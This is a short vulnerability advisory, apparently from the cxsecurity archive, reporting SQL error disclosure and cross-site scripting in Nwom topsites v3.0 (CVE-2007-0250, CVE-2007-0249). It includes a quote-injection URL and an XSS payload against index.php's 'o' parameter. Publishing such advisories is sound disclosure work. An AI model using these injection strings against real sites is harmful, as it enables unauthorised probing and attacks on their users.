Bug: Nwom topsites v3.0 ( Ascii Version )

Search:
WLB2

Nwom topsites v3.0

Published
Credit
Risk
2007.01.17
Luny
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-0250
CVE-2007-0249
No
Yes

Nwom topsites v3.0
http://www.nwom.net

Vulnerable files:

Comment input.
index.php

SQL info released on error:
http://www.example.com/index.php?o='

XSS:
http://www.example.com/index.php?o=<IMG%20SRC=javascript:alert(String.fr
omCharCode(88,83,83))>

- Luny

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version